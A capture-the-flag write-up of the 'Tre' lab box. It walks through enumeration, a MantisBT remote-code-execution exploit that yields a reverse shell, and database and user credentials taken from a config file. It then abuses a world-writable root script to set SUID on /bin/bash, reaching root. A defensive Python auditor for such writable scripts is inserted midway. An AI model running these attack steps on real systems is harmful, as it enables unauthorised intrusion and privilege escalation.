Key takeaways
- There is more than one way to cross each privilege boundary
- Watch what pspy64 reports
Detailed steps
Start, as usual, with an nmap scan: ports 80, 8082 and 22 are open.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-16 03:39 UTC
Nmap scan report for 192.168.56.84
Host is up (0.00083s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA)
| 256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA)
|_ 256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Tre
8082/tcp open http nginx 1.14.2
|_http-title: Tre
|_http-server-header: nginx/1.14.2
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Port 80 gives us the most information; there are quite a few hidden paths.
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.117.84/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 502,404,429,503,400
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/cms (Status: 301) [Size: 314] [--> http://192.168.117.84/cms/]
/mantisbt (Status: 301) [Size: 319] [--> http://192.168.117.84/mantisbt/]
/server-status (Status: 403) [Size: 279]
/system (Status: 401) [Size: 461]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================
Searching for mantisbt turns up an RCE vulnerability, but we have no version information yet, so all we can do is try it and see.
C:\home\kali\Documents\OFFSEC\play\Tre> searchsploit -m 48818
  Exploit: Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)
      URL: https://www.exploit-db.com/exploits/48818
     Path: /usr/share/exploitdb/exploits/php/webapps/48818.py
    Codes: CVE-2019-15715, CVE-2017-7615
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Documents/OFFSEC/play/Tre/48818.py
C:\home\kali\Documents\OFFSEC\play\Tre> python2 48818.py
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Successfully hijacked account!
Successfully logged in!
Triggering reverse shell
Cleaning up
Deleting the dot_tool config.
Deleting the relationship_graph_enable config.
Successfully cleaned up
The local nc -nlvp 80 listener receives the reverse shell.
C:\home\kali\Documents\OFFSEC\play\Tre> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.117.84] 38846
bash: cannot set terminal process group (569): Inappropriate ioctl for device
bash: no job control in this shell
www-data@tre:/var/www/html/mantisbt$
Running pspy64 to observe the box, we see that this script is executed roughly once per second, and that we have write permission on /usr/bin/check-system.
2024/12/16 07:47:15 CMD: UID=0 PID=1434 | /bin/bash /usr/bin/check-system
2024/12/16 07:47:16 CMD: UID=0 PID=1436 | /bin/bash /usr/bin/check-system
2024/12/16 07:47:17 CMD: UID=0 PID=1437 | /bin/bash /usr/bin/check-system
2024/12/16 07:47:18 CMD: UID=0 PID=1438 | /bin/bash /usr/bin/check-system
2024/12/16 07:47:19 CMD: UID=0 PID=1439 | /bin/bash /usr/bin/check-system
2024/12/16 07:47:20 CMD: UID=0 PID=1440 | /bin/bash /usr/bin/check-system
2024/12/16 07:47:21 CMD: UID=0 PID=1441 | /bin/bash /usr/bin/check-system
......
www-data@tre:/var/www/html/mantisbt$ ls -l /usr/bin/check-system
ls -l /usr/bin/check-system
-rw----rw- 1 root root 135 May 12 2020 /usr/bin/check-system
www-data@tre:/var/www/html/mantisbt$ cat /usr/bin/check-system
cat /usr/bin/check-system
DATE=`date '+%Y-%m-%d %H:%M:%S'`
echo "Service started at ${DATE}" | systemd-cat -p info
while :
do
echo "Checking...";
sleep 1;
done
We overwrite it directly to give /bin/bash the SUID bit, but this does not work; the suspicion is that, because the script runs in an endless loop, changing the file on disk does not take effect immediately.
echo "chmod +s /bin/bash" > /usr/bin/check-system
cat /usr/bin/check-system
chmod +s /bin/bash
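From the defender's side, the finding above (a root-executed script whose mode is -rw----rw-, i.e. world-writable) is the kind of misconfiguration that should be caught before an attacker does. The following is an added example, not code from the writeup or from pspy: it parses pspy-style "CMD: UID=... | ..." lines, extracts scripts that UID 0 launches through an interpreter, and flags any whose ownership or mode lets a non-root user rewrite them. The sample pspy lines (the apache2 and /opt/backup.py entries) and the INTERPRETERS list are constructed assumptions for the demonstration.

```python
import os
import re
import stat

# Constructed sample in the same line format as the pspy64 capture above.
# The apache2 and backup.py lines are made up to show a non-root process being
# ignored and a second interpreter being recognised.
SAMPLE_PSPY = """\
2024/12/16 07:47:15 CMD: UID=0 PID=1434 | /bin/bash /usr/bin/check-system
2024/12/16 07:47:15 CMD: UID=33 PID=1435 | /usr/sbin/apache2 -k start
2024/12/16 07:47:16 CMD: UID=0 PID=1436 | /bin/bash /usr/bin/check-system
2024/12/16 07:47:16 CMD: UID=0 PID=1438 | /usr/bin/python3 /opt/backup.py
"""

PSPY_LINE = re.compile(r"CMD: UID=(\d+)\s+PID=\d+\s+\|\s+(.+)$")

# Interpreters whose first path-like argument is a script read from disk
# (assumed list; extend to match the hosts you audit).
INTERPRETERS = {"/bin/bash", "/bin/sh", "/usr/bin/bash", "/usr/bin/sh",
                "/usr/bin/python3", "/usr/bin/perl"}


def root_script_paths(pspy_text):
    """Return the set of script paths that UID 0 launched via an interpreter."""
    paths = set()
    for line in pspy_text.splitlines():
        m = PSPY_LINE.search(line)
        if not m or m.group(1) != "0":
            continue
        argv = m.group(2).split()
        if len(argv) < 2 or argv[0] not in INTERPRETERS:
            continue
        # Skip option flags and take the first argument that is an absolute path.
        for arg in argv[1:]:
            if arg.startswith("/"):
                paths.add(arg)
                break
    return paths


def unsafe_reason(mode, uid, gid):
    """Explain why a root-executed script with this stat triple is unsafe, or None.

    The writeup's case is the first branch: /usr/bin/check-system was
    root-owned but mode 0606, so www-data could replace its body.
    """
    if mode & stat.S_IWOTH:
        return "world-writable"
    if uid != 0:
        return f"owned by uid {uid}, who can rewrite it"
    if mode & stat.S_IWGRP and gid != 0:
        return f"writable by gid {gid}"
    return None


def parse_ls_mode(perm_string):
    """Convert an `ls -l` permission string such as '-rw----rw-' to an int mode.

    Uppercase S/T (setuid/sticky without execute) are treated as unset; the
    setuid/setgid/sticky bits themselves are not represented.
    """
    mode = 0
    for i, ch in enumerate(perm_string[1:10]):
        if ch not in "-ST":
            mode |= 1 << (8 - i)
    return mode


def audit_paths(paths):
    """stat each existing path and map it to its unsafe reason (or None)."""
    result = {}
    for p in sorted(paths):
        try:
            st = os.stat(p)
        except FileNotFoundError:
            continue
        result[p] = unsafe_reason(stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid)
    return result


if __name__ == "__main__":
    # Re-check the exact ls -l line from the writeup without needing the file.
    print("check-system:", unsafe_reason(parse_ls_mode("-rw----rw-"), 0, 0))
    # Live audit of whatever the sample pspy lines point at on this host.
    for path, reason in audit_paths(root_script_paths(SAMPLE_PSPY)).items():
        print(path, "->", reason or "ok")
```

In practice you would feed a real pspy capture (or the command lines from cron, systemd units and timers) into root_script_paths and run audit_paths as root on the host; anything that returns a reason should be fixed with chown root:root and chmod 0755 (or 0700) on the script and its parent directories.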
Uploading and running linpeas.sh reveals an interesting file, /var/www/html/mantisbt/config/config_inc.php, which contains the database username and password; however, we cannot log in with them from the command line.
$g_hostname = 'localhost';
$g_db_type = 'mysqli';
$g_database_name = 'mantis';
$g_db_username = 'mantissuser';
$g_db_password = 'password@123AS';
Searching further, we find an adminer.php. This file was not found during path brute-forcing, presumably because of the wordlist.
drwxr-xr-x 16 www-data www-data 12288 Apr 1 2017 mantisbt
-rw-r--r-- 1 www-data www-data 227984 Oct 24 2017 file.jpg
drwxr-xr-x 3 root root 4096 May 12 2020 ..
-rw-r--r-- 1 www-data www-data 164 May 12 2020 index.html
-rw-r--r-- 1 root root 20 May 12 2020 info.php
drwxr-xr-x 16 root root 12288 May 12 2020 system
-rw-r--r-- 1 root root 489307 May 12 2020 adminer.php
drwxr-xr-x 5 www-data www-data 4096 May 12 2020 .
drwxr-xr-x 9 www-data www-data 4096 May 12 2020 cms
pwd
/var/www/html
Visiting it shows a MySQL web UI. Logging in with the discovered credentials mantissuser/password@123AS succeeds. In mantis_user_table, the realname of the tre row looks like a password, and the remote server happens to have a user named tre.
We try su tre; it succeeds, and we find that this user is allowed to reboot the server.
www-data@tre:/tmp$ su tre
su tre
Password: Tr3@123456A!id
uid=1000(tre) gid=1000(tre) groups=1000(tre),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
sudo -l
Matching Defaults entries for tre on tre:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tre may run the following commands on tre:
    (ALL) NOPASSWD: /sbin/shutdown
Perhaps the change to /usr/bin/check-system will take effect once the server has been rebooted.
sudo /sbin/shutdown -r
Shutdown scheduled for Mon 2024-12-16 08:03:36 EST, use 'shutdown -c' to cancel.
Session terminated, killing shell... ...killed.
bash: [1497: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@tre:/var/www/html/mantisbt$ exit
等服務器重啟好以后,按照相同的步驟重新創建reverse shell,提權成功
C:\home\kali\Documents\OFFSEC\play\Tre> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.196] from (UNKNOWN) [192.168.117.84] 37042
bash: cannot set terminal process group (508): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.0$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
bash-5.0$ /bin/bash -p
/bin/bash -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
cat /root/proof.txt
22f5d43e241d15a25e6d1eae87510c31